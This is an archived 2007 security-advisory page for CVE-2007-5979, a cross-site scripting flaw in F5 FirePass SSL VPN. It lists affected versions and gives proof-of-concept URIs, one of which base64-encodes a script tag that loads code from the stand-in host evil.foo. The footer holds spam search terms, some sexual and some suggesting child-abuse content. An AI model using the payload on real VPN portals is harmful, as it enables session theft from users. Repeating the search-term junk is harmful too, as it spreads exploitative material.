about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability


Title F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
Published 2007-11-12-12:00AM
Updated 2007-11-22-10:44PM
Class Input Validation Error
CVE   CVE-2007-5979
Remote  Yes
Local  No
Credit  Jan Fry <jan.fry@procheckup.com> and Adrian Pastor <adrian.pastor@procheckup.com> of Procheckup Ltd are credited with the discovery of this vulnerability.
Vulnerable  F5 FirePass 4100 5.4.2
F5 FirePass 4100 0
F5 FirePass 6.0.1
F5 FirePass 5.5.2
F5 FirePass 6.0
F5 FirePass 5.4
F5 FirePass
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.The following example URIs demonstrate this issue: https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 19:13:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
shepard hu mambo Remo sexvidoi ANEMAL SEX Www.Thenni K.d Indien pic xp/exploit priya mani 50pic rkhesawant www.boii phpadsnew anyboard.c all cartoo www.squido vulnerabil sharon sto INvision P SEX16 www.school ls lolita hotmail ex ls lolita Block /search/ex servelet sexy photo remository ls lolita ls lolita indiancoll News Searc XXXBILUEPR www.fyule. hoang thuy new malaya X VIDEOSCO www.womans sex for sh Www68 com www.szwill www.wd42.c Crack+Data GET /u www.pakist sri++lanka aix web-ba Wrld.Xxx lib%252Far